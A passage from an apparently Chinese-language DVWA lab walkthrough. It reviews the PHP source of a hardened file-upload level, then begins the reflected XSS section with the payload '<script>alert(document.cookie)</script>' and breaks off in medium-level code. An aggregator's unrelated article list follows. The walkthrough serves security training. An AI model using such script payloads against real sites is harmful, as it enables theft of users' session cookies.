        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "
${target_file} succesfully uploaded!
";
        }
        else {
            // No
            echo '
Your image was not uploaded.
';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '
Your image was not uploaded. We can only accept JPEG or PNG images.
';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

我们审计源码，发现其中有Anti-CSRF来预防CSRF。

$target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

通过这步代码，将目标文件的名字最后改为MD5处理后的名字，后缀改为上传时的最后的后缀。同事临时文件tmp_file也进行相同的处理。

然后判断上传的后缀和文件类型是否符合图片的格式，符合条件，才进行存储。

XSS(Reflected)

low

我们首先输入1，测试发现，是将我们的输入直接输出在了html中，所以可以尝试写一段脚本进去。

<script>alert(document.cookie)</script>

成功。。。

Medium

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '
                    
                    

                

你可能感兴趣的:(渗透测试)

• 【Death Note】网吧战神之7天爆肝渗透测试死亡笔记_sqlmap在默认情况下除了使用 char() 函数防止出现单引号 2401_84561374 程序员笔记
  网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。需要这份系统化的资料的朋友，可以戳这里获取一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！特殊服务端口2181zookeeper服务未授权访问
• 渗透测试的了解 锅盖'awa' 网络安全小白之路安全性测试安全
  文章目录概述一、渗透测试分类1.黑盒测试／外部测试2.白盒测试／内部测试3.灰盒测试／组合测试二、渗透测试-目标分类1、主机操作系统渗透2、数据库系统渗透3、应用系统渗透4、网络设备渗透三、渗透测试过程（七个阶段）1.前期交互阶段（Pre-EngagementInteraction）2.情报搜集阶段（InformationGathering）3.威胁建模阶段（ThreatModeling）4.漏洞
• 网络安全测评技术与标准 坚持可信 信息安全web安全网络安全
  网络安全测评是评估信息系统、网络和应用程序的安全性，以发现潜在的漏洞和威胁，并确保系统符合安全标准和政策的过程。以下是常见的网络安全测评类型：1.渗透测试（PenetrationTesting）描述：通过模拟真实的攻击，评估系统、网络和应用程序的安全性，识别和修复漏洞。目标：发现系统中的安全漏洞，评估其可能被利用的风险。方法：黑盒测试：测试人员没有系统内部信息，模拟外部攻击者。白盒测试：测试人员拥
• 写出渗透测试信息收集详细流程 卿酌南烛_b805
  一、扫描域名漏洞：域名漏洞扫描工具有AWVS、APPSCAN、Netspark、WebInspect、Nmap、Nessus、天镜、明鉴、WVSS、RSAS等。二、子域名探测：1、dns域传送漏洞2、搜索引擎查找（通过Google、bing、搜索c段）3、通过ssl证书查询网站：https://myssl.com/ssl.html和https://www.chinassl.net/ssltools
• 网络安全（黑客）自学 白帽子凯哥 web安全安全网络安全服务器网络
  一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你是一
• 网络安全（黑客）——自学2024 白帽子黑客-宝哥 web安全安全嵌入式硬件网络单片机
  一、什么是网络安全网络安全是一种综合性的概念，涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、网络安全怎么入门安全并非孤立存在，而是建立在其计算机基础之上的应用技术。
• 2024网络安全学习路线 非常详细 推荐学习 白帽黑客-晨哥 web安全学习安全数据库php
  关键词：网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线首先咱们聊聊，学习网络安全方向通常会有哪些问题1、打基础时间太长学基础花费很长时间，光语言都有几门，有些人会倒在学习linux系统及命令的路上，更多的人会倒在学习语言上；2、知识点掌握程度不清楚对于网络安全基础内容，很多人不清楚需要学到什么程度，囫囵吞枣，导致在基础上花费太多时间；看到很多小伙伴，买了HTML，PHP，数据库，计算机
• 入门网络安全工程师要学习哪些内容 白帽黑客2659 web安全学习安全网安入门网络安全
  大家都知道网络安全行业很火，这个行业因为国家政策趋势正在大力发展，大有可为!但很多人对网络安全工程师还是不了解，不知道网络安全工程师需要学什么?知了堂小编总结出以下要点。网络安全工程师是一个概称，学习的东西很多，具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师，学的内容侧重点就和渗透测试工程师不一样，如果你想成为安全开发工程师，学的侧重点就和安全运维工程师不一样。网络安全工程师学的东
• python绝技运用python成为顶级pdf_python绝技：运用python成为顶级黑客 中文pdf完整版[42MB]... weixin_39851261
  Python是一门常用的编程语言，它不仅上手容易，而且还拥有丰富的支持库。对经常需要针对自己所处的特定场景编写专用工具的黑客、计算机犯罪调查人员、渗透测试师和安全工程师来说，Python的这些特点可以帮助他们又快又好地完成这一任务，以极少的代码量实现所需的功能。Python绝技：运用Python成为顶级黑客结合具体的场景和真实的案例，详述了Python在渗透测试、电子取证、网络流量分析、无线安全、
• 2024网络安全学习路线 非常详细 推荐学习 白帽黑客-晨哥 web安全学习安全数据库php
  关键词：网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线首先咱们聊聊，学习网络安全方向通常会有哪些问题1、打基础时间太长学基础花费很长时间，光语言都有几门，有些人会倒在学习linux系统及命令的路上，更多的人会倒在学习语言上；2、知识点掌握程度不清楚对于网络安全基础内容，很多人不清楚需要学到什么程度，囫囵吞枣，导致在基础上花费太多时间；看到很多小伙伴，买了HTML，PHP，数据库，计算机
• 入门网络安全工程师要学习哪些内容 白帽黑客2659 web安全学习安全网安入门网络安全
  大家都知道网络安全行业很火，这个行业因为国家政策趋势正在大力发展，大有可为!但很多人对网络安全工程师还是不了解，不知道网络安全工程师需要学什么?知了堂小编总结出以下要点。网络安全工程师是一个概称，学习的东西很多，具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师，学的内容侧重点就和渗透测试工程师不一样，如果你想成为安全开发工程师，学的侧重点就和安全运维工程师不一样。网络安全工程师学的东
• 网络安全工程师自主学习计划表（具体到阶段目标） 大模型综述 web安全网络安全系统安全安全学习
  前言接下来我将给大家分享一份网络安全工程师自学计划指南，全文将从学习路线、学习规划、学习方法三个方向来讲述零基础小白如何通过自学进阶网络安全工程师，全文篇幅有点长，同学们可以先点个收藏，以免日后错过了。目录前言学习路线学习规划初级1、网络安全理论知识（2天）2、渗透测试基础（1周）3、操作系统基础（1周）4、计算机网络基础（1周）5、数据库基础操作（2天）6、Web渗透（1周）中级、高级7、脚本编
• 网络安全（黑客技术）—2024自学手册 一个迷人的黑客 web安全安全网络学习网络安全信息安全渗透测试
  前言什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行，因为不知如何去学，在这里，我将这个整份答案分为黑客（网络安全）入门必备、黑客（网络安全）职业指南、黑客（网络安全）学习导航三大章节，涉及价值观、方法论、执行力、行业分类、职位解读、法
• 自学黑客（网络安全） 白袍无涯 web安全网络安全网络安全系统安全运维计算机网络
  前言：想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟
• 网络安全最新网络安全-SSRF漏洞原理、攻击与防御(1)，2024年最新网络安全程序员架构之路该如何继续学习 2401_84265972 程序员网络安全学习面试
  如何自学黑客&网络安全黑客零基础入门学习路线&规划初级黑客1、网络安全理论知识（2天）①了解行业相关背景，前景，确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。（非常重要）2、渗透测试基础（一周）①渗透测试的流程、分类、标准②信息收集技术：主动/被动信息搜集、Nmap工具、GoogleHacking③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF
• 网络安全（黑客）自学 白帽子凯哥 web安全安全网络安全服务器网络
  一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你是一
• 自学黑客（网络安全） L世界凌乱了 web安全安全网络安全网络学习
  前言：想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟
• 安全检查怎么做？只有最小化原则！ 吉祥同学学安全
  背景：什么是安全检查，安全检查就是你的监管部门对你的网络进行安全检查，检查是否符合规定（这里只聊技术性的检查），比如通过攻防演习对你的系统进行检查或者通过渗透测试对你的系统进行检查，而在被检查前作为被检查单位往往要做很多工作，防止在被检查过程中检查处很多问题，而这时有个新的名词叫：迎检，也就是迎接检查的意思，前些年迎检在运营商行业特别的常见，近些年随着国家对网络安全的重视，比如电力、金融、基础设施
• 渗透测试从入门到入狱（一） yangc随想
  信息收集nslookupnslookupsina.com-type=any8.8.8.8nslookup>域名>settype/q=a/mx/ns/any>域名查询域名主机服务器[email protected]+noall+answermail.163.comany//只看恢复信息dig-x220.181.14.157#反向查询（ptr）d
• Web安全和渗透测试有什么关系？ 程序员_大白 web安全安全
  做渗透测试的一个环节就是测试web安全，需要明白漏洞产生原理，通过信息收集互联网暴露面，进行漏洞扫描，漏洞利用，必要时进行脚本自编写和手工测试，力求挖出目标存在的漏洞并提出整改建议，当然如果技术再精一些，还要学习内网渗透（工作组和域环境），白盒审计，app，小程序渗透那些了......总之，web安全包含于渗透测试，但不是渗透测试的全部。`黑客&网络安全如何学习今天只要你给我的文章点赞，我私藏的网
• 网络安全（黑客）自学 白帽子凯哥 web安全安全网络安全服务器网络
  一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你是一
• 零基础能学网络安全吗？ leah126 程序员渗透测试编程web安全安全网络
  当然可以。但网络安全有很多方向，如果你想转行网络安全技术方向，建议先着手学web安全方向。因为，web安全相对于整个网络安全行业来说难度是相对比较低的，学起来更加容易入手。虽然渗透测试工程师、溯源取证、红蓝攻防等等这些岗位看起来很不错，但是技术门槛特别高，对于0基础的人来说学起来会相当吃力。所以，web安全方向对于初学者来说是最好入门选择。那么该如何学习呢？1.买一本《白帽子讲web安全》，先了解
• 零基础转行学网络安全怎么样？能找到什么样的工作？ 爱吃小石榴16 web安全安全人工智能运维学习
  网络安全对于现代社会来说变得越来越重要，但是很多人对于网络安全的知识却知之甚少。那么，零基础小白可以学网络安全吗？答案是肯定的。零基础转行学习网络安全是完全可行的，但需要明确的是，网络安全是一个既广泛又深入的领域，包含了网络协议、系统安全、应用安全、密码学、渗透测试、漏洞挖掘、安全编程、安全运维等多个方面。。网络安全是一个快速发展的领域，对专业人才的需求不断增长。以下是一些关于零基础转行学习网络安
• 【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有 这一篇真的够了 webfker from 0 to 1 githubgitjava
  目录面经牛客奇安信面经（五星推荐）牛客面经（推荐）渗透测试面经（推荐）渗透测试技巧计网面经SQL注入漏洞注入绕过XXE漏洞最强面经Github面经模拟面WEB安全PHP安全网络安全密码学一、青藤二、360三、漏洞盒子四、未知厂商五、长亭-红队六、qax七、天融信八、安恒九、长亭十、国誉网安十一、360-红队十二、天融信十三、长亭-2十四、360-2十五、极盾科技十六、阿里十七、长亭3十八、qax-
• Metasploit技术博客：全面指南 Hello.Reader 渗透测试安全测试安全性测试安全架构web安全安全安全威胁分析
  一、概述Metasploit是一款功能强大的渗透测试框架，在网络安全领域中扮演着关键角色。无论你是初学者还是经验丰富的渗透测试专家，Metasploit都提供了一整套工具，用于发现、利用和验证系统中的安全漏洞。本文将详细探讨Metasploit的基础知识、常用模块、实战案例、高级功能、最佳实践以及未来发展趋势，为您提供全面的技术指南。二、什么是Metasploit？Metasploit由Rapid
• 深入了解 Nmap：网络安全扫描工具的强大功能与实战应用 Hello.Reader 安全测试渗透测试web安全安全
  1.什么是Nmap？Nmap（NetworkMapper）是一款开源的网络扫描工具，被广泛用于网络发现、管理和安全审计。自1997年由GordonLyon（Fyodor）发布以来，Nmap一直是网络管理员、安全专家、渗透测试人员的重要工具。Nmap支持多种操作系统，包括Windows、Linux、MacOS和其他类Unix系统。Nmap的功能不仅限于端口扫描，还可以执行操作系统检测、服务版本检测、
• 2024网络安全学习路线 非常详细 推荐学习 白帽黑客-晨哥 web安全学习安全数据库php
  关键词：网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线首先咱们聊聊，学习网络安全方向通常会有哪些问题1、打基础时间太长学基础花费很长时间，光语言都有几门，有些人会倒在学习linux系统及命令的路上，更多的人会倒在学习语言上；2、知识点掌握程度不清楚对于网络安全基础内容，很多人不清楚需要学到什么程度，囫囵吞枣，导致在基础上花费太多时间；看到很多小伙伴，买了HTML，PHP，数据库，计算机
• 网络安全售前入门05安全服务——渗透测试服务方案 努力工作的网安人 网络安全web安全安全经验分享网络安全
  目录1.服务概述2.测试内容2.1网络层安全2.2系统层安全2.3应用层安全3.测试范围4.漏洞分级5.渗透用例6.测试风险6.1风险说明6.2风险规避6.3数据备份7.服务输出1.服务概述渗透性测试是对安全情况最客观、最直接的评估方式，主要是模拟黑客的攻击方法对系统和网络进行非破坏性质的攻击性测试，目的是侵入系统，获取系统控制权并将入侵的过程和细节产生报告给用户，由此证实用户系统所存在的安全威胁
• 小白如何快速入门网络安全里，主要岗位有哪些？ baimao__沧海 web安全安全linuxtcpdump运维java
  入门Web安全、安卓安全、二进制安全、工控安全还是智能硬件安全等等，每个不同的领域要掌握的技能也不同。当然入门Web安全相对难度较低，也是很多人的首选。主要还是看自己的兴趣方向吧。本文就以下几个问题来说明网络安全大致学习过程网络安全主要岗位有哪些安全领域技术方向分类渗透测试学习路线小白如何快速入门一、网络安全里的主要的岗位有哪些：渗透测试工程师：主要是模拟黑客对目标业务系统进行攻击，点到为止安全运
• 【渗透测试】利用hook技术破解前端JS加解密 - JS-Forward Hello_Brian 渗透测试安全Hook技术前端JS加解密渗透测试web安全
  前言在做渗透测试项目时，尤其是金融方面，经常会遇到前端JS加解密技术，看着一堆堆密密麻麻的密文，会给人一种无力感。Hook技术则会帮助我们无需获取加解密密钥的前提下，获取明文进行渗透测试环境准备JS-ForwardBurpsuiteFiddler网上公开的加解密逻辑漏洞的靶场源码某大佬搭建的公网测试环境（请礼貌使用）：http://39.98.108.20:8085/Hook-JS技术详解正常访问
• [黑洞与暗粒子]没有光的世界 comsci
       无论是相对论还是其它现代物理学,都显然有个缺陷,那就是必须有光才能够计算      但是,我相信,在我们的世界和宇宙平面中,肯定存在没有光的世界....      那么,在没有光的世界,光子和其它粒子的规律无法被应用和考察,那么以光速为核心的 &nbs
• jQuery Lazy Load 图片延迟加载 aijuans jquery
  基于 jQuery 的图片延迟加载插件，在用户滚动页面到图片之后才进行加载。 对于有较多的图片的网页，使用图片延迟加载，能有效的提高页面加载速度。 版本： jQuery v1.4.4+ jQuery Lazy Load v1.7.2 注意事项： 需要真正实现图片延迟加载，必须将真实图片地址写在 data-original 属性中。若 src
• 使用Jodd的优点 Kai_Ge jodd
  1.  简化和统一 controller ，抛弃 extends SimpleFormController ，统一使用 implements Controller 的方式。 2.  简化 JSP 页面的 bind, 不需要一个字段一个字段的绑定。 3.  对 bean 没有任何要求，可以使用任意的 bean 做为 formBean。   使用方法简介
• jpa Query转hibernate Query 120153216 Hibernate
  public List<Map> getMapList(String hql, Map map) { org.hibernate.Query jpaQuery = entityManager.createQuery(hql); if (null != map) { for (String parameter : map.keySet()) { jp
• Django_Python3添加MySQL/MariaDB支持 2002wmj mariaDB
  现状 首先，[email protected] 中默认的引擎为 django.db.backends.mysql 。但是在Python3中如果这样写的话，会发现 django.db.backends.mysql 依赖 MySQLdb[5] ，而 MySQLdb 又不兼容 Python3 于是要找一种新的方式来继续使用MySQL。 MySQL官方的方案 首先据MySQL文档[3]说，自从MySQL
• 在SQLSERVER中查找消耗IO最多的SQL 357029540 SQL Server
  返回做IO数目最多的50条语句以及它们的执行计划。 select top 50   (total_logical_reads/execution_count) as avg_logical_reads,  (total_logical_writes/execution_count) as avg_logical_writes,  (tot
• spring UnChecked 异常 官方定义！ 7454103 spring
    如果你接触过spring的 事物管理！那么你必须明白 spring的 非捕获异常！ 即 unchecked 异常！ 因为 spring 默认这类异常事物自动回滚！！ public static boolean isCheckedException(Throwable ex) { return !(ex instanceof RuntimeExcep
• mongoDB 入门指南、示例 adminjun javamongodb操作
  一、准备工作 1、 下载mongoDB 下载地址：http://www.mongodb.org/downloads 选择合适你的版本 相关文档：http://www.mongodb.org/display/DOCS/Tutorial 2、 安装mongoDB A、 不解压模式： 将下载下来的mongoDB-xxx.zip打开，找到bin目录，运行mongod.exe就可以启动服务，默
• CUDA 5 Release Candidate Now Available aijuans CUDA
  The CUDA 5 Release Candidate is now available at http://developer.nvidia.com/<wbr></wbr>cuda/cuda-pre-production. Now applicable to a broader set of algorithms, CUDA 5 has advanced fe
• Essential Studio for WinRT网格控件测评 Axiba JavaScripthtml5
  Essential Studio for WinRT界面控件包含了商业平板应用程序开发中所需的所有控件，如市场上运行速度最快的grid 和chart、地图、RDL报表查看器、丰富的文本查看器及图表等等。同时，该控件还包含了一组独特的库，用于从WinRT应用程序中生成Excel、Word以及PDF格式的文件。此文将对其另外一个强大的控件——网格控件进行专门的测评详述。 网格控件功能 1、
• java 获取windows系统安装的证书或证书链 bewithme windows
        有时需要获取windows系统安装的证书或证书链，比如说你要通过证书来创建java的密钥库  。 有关证书链的解释可以查看此处 。   public static void main(String[] args) { SunMSCAPI providerMSCAPI = new SunMSCAPI(); S
• NoSQL数据库之Redis数据库管理(set类型和zset类型) bijian1013 redis数据库NoSQL
  4.sets类型         Set是集合，它是string类型的无序集合。set是通过hash table实现的，添加、删除和查找的复杂度都是O(1)。对集合我们可以取并集、交集、差集。通过这些操作我们可以实现sns中的好友推荐和blog的tag功能。         sadd：向名称为key的set中添加元
• 异常捕获何时用Exception，何时用Throwable bingyingao
  用Exception的情况 try {        //可能发生空指针、数组溢出等异常         } catch (Exception e) {          
• 【Kafka四】Kakfa伪分布式安装 bit1129 kafka
  在http://bit1129.iteye.com/blog/2174791一文中，实现了单Kafka服务器的安装，在Kafka中，每个Kafka服务器称为一个broker。本文简单介绍下，在单机环境下Kafka的伪分布式安装和测试验证   1. 安装步骤   Kafka伪分布式安装的思路跟Zookeeper的伪分布式安装思路完全一样，不过比Zookeeper稍微简单些(不
• Project Euler bookjovi haskell
  Project Euler是个数学问题求解网站，网站设计的很有意思，有很多problem，在未提交正确答案前不能查看problem的overview，也不能查看关于problem的discussion thread，只能看到现在problem已经被多少人解决了，人数越多往往代表问题越容易。     看看problem 1吧： Add all the natural num
• Java-Collections Framework学习与总结-ArrayDeque BrokenDreams Collections
          表、栈和队列是三种基本的数据结构，前面总结的ArrayList和LinkedList可以作为任意一种数据结构来使用，当然由于实现方式的不同，操作的效率也会不同。         这篇要看一下java.util.ArrayDeque。从命名上看
• 读《研磨设计模式》-代码笔记-装饰模式-Decorator bylijinnan java设计模式
  声明： 本文只为方便我个人查阅和理解，详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.io.BufferedOutputStream; import java.io.DataOutputStream; import java.io.FileOutputStream; import java.io.Fi
• Maven学习(一) chenyu19891124 Maven私服
      学习一门技术和工具总得花费一段时间，5月底6月初自己学习了一些工具，maven+Hudson+nexus的搭建，对于maven以前只是听说，顺便再自己的电脑上搭建了一个maven环境，但是完全不了解maven这一强大的构建工具，还有ant也是一个构建工具，但ant就没有maven那么的简单方便，其实简单点说maven是一个运用命令行就能完成构建，测试，打包，发布一系列功
• [原创]JWFD工作流引擎设计----节点匹配搜索算法(用于初步解决条件异步汇聚问题) 补充 comsci 算法工作PHP搜索引擎嵌入式
  本文主要介绍在JWFD工作流引擎设计中遇到的一个实际问题的解决方案，请参考我的博文"带条件选择的并行汇聚路由问题"中图例A2描述的情况(http://comsci.iteye.com/blog/339756),我现在把我对图例A2的一个解决方案公布出来，请大家多指点 节点匹配搜索算法(用于解决标准对称流程图条件汇聚点运行控制参数的算法) 需要解决的问题：已知分支
• Linux中用shell获取昨天、明天或多天前的日期 daizj linuxshell上几年昨天获取上几个月
  在Linux中可以通过date命令获取昨天、明天、上个月、下个月、上一年和下一年 # 获取昨天 date -d 'yesterday'  # 或 date -d 'last day' # 获取明天 date -d 'tomorrow'   # 或 date -d 'next day' # 获取上个月 date -d 'last month' #
• 我所理解的云计算 dongwei_6688 云计算
        在刚开始接触到一个概念时，人们往往都会去探寻这个概念的含义，以达到对其有一个感性的认知，在Wikipedia上关于“云计算”是这么定义的，它说：        Cloud computing is a phrase used to describe a variety of computing co
• YII CMenu配置 dcj3sjt126com yii
  Adding id and class names to CMenu We use the id and htmlOptions to accomplish this. Watch. //in your view $this->widget('zii.widgets.CMenu', array( 'id'=>'myMenu', 'items'=>$this-&g
• 设计模式之静态代理与动态代理 come_for_dream 设计模式
  静态代理与动态代理        代理模式是java开发中用到的相对比较多的设计模式，其中的思想就是主业务和相关业务分离。所谓的代理设计就是指由一个代理主题来操作真实主题，真实主题执行具体的业务操作，而代理主题负责其他相关业务的处理。比如我们在进行删除操作的时候需要检验一下用户是否登陆，我们可以删除看成主业务，而把检验用户是否登陆看成其相关业务
• 【转】理解Javascript 系列 gcc2ge JavaScript
  理解Javascript_13_执行模型详解 摘要: 在《理解Javascript_12_执行模型浅析》一文中,我们初步的了解了执行上下文与作用域的概念，那么这一篇将深入分析执行上下文的构建过程，了解执行上下文、函数对象、作用域三者之间的关系。函数执行环境简单的代码:当调用say方法时，第一步是创建其执行环境，在创建执行环境的过程中，会按照定义的先后顺序完成一系列操作:1.首先会创建一个
• Subsets II hcx2013 set
  Given a collection of integers that might contain duplicates, nums, return all possible subsets. Note: Elements in a subset must be in non-descending order. The solution set must not conta
• Spring4.1新特性——Spring缓存框架增强 jinnianshilongnian spring4
  目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
• shell嵌套expect执行命令 liyonghui160com
      一直都想把expect的操作写到bash脚本里,这样就不用我再写两个脚本来执行了,搞了一下午终于有点小成就,给大家看看吧.   系统:centos 5.x   1.先安装expect yum -y install expect   2.脚本内容: cat auto_svn.sh   #!/bin/bash
• Linux实用命令整理 pda158 linux
  0. 基本命令 　　linux 基本命令整理 　 　1. 压缩 解压 　　tar -zcvf a.tar.gz a   #把a压缩成a.tar.gz 　　tar -zxvf a.tar.gz     #把a.tar.gz解压成a 　 　2. vim小结 　　2.1 vim替换 　　:m,ns/word_1/word_2/gc  
• 独立开发人员通向成功的29个小贴士 shoothao 独立开发
  概述：本文收集了关于独立开发人员通向成功需要注意的一些东西,对于具体的每个贴士的注解有兴趣的朋友可以查看下面标注的原文地址。 明白你从事独立开发的原因和目的。 保持坚持制定计划的好习惯。 万事开头难，第一份订单是关键。 培养多元化业务技能。 提供卓越的服务和品质。 谨小慎微。 营销是必备技能。 学会组织，有条理的工作才是最有效率的。 “独立
• JAVA中堆栈和内存分配原理 uule java
  1、栈、堆 1.寄存器：最快的存储区, 由编译器根据需求进行分配,我们在程序中无法控制.2. 栈：存放基本类型的变量数据和对象的引用，但对象本身不存放在栈中，而是存放在堆（new 出来的对象）或者常量池中（字符串常量对象存放在常量池中。）3. 堆：存放所有new出来的对象。4. 静态域：存放静态成员（static定义的）5. 常量池：存放字符串常量和基本类型常量（public static f

按字母分类： ABCDEFGHIJKLMNOPQRSTUVWXYZ其他

首页 - 关于我们 - 站内搜索 - Sitemap - 侵权投诉

版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.